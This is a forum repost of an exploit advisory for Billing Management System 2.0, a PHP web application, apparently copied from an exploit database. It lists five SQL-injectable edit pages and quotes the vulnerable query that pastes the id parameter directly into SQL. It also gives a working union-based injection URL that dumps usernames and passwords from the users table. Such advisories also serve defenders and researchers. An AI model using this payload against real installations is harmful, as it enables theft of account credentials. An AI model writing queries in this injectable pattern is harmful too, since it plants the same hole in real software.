游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

Billing Management System 2.0 - Union based SQL injection (Authenticated)

PHP,webapps,

发布于2022年11月4日2年前

# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
# Date: 2021-05-16
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0

# This web application contains several SQL injection vulnerabilities in the following paths:
        - http://localhost/editgroup.php?id=1
        - http://localhost/edituser.php?id=1
        - http://localhost/editcategory.php?id=10
        - http://localhost/editproduct.php?id=1
        - http://localhost/editsales.php?id=1

# PoC (editgroup.php):

- Vulnerable code:
        $sql="SELECT * from user_groups where delete_status='0' and
id='".$_GET['id']." '";

- Payload:

http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+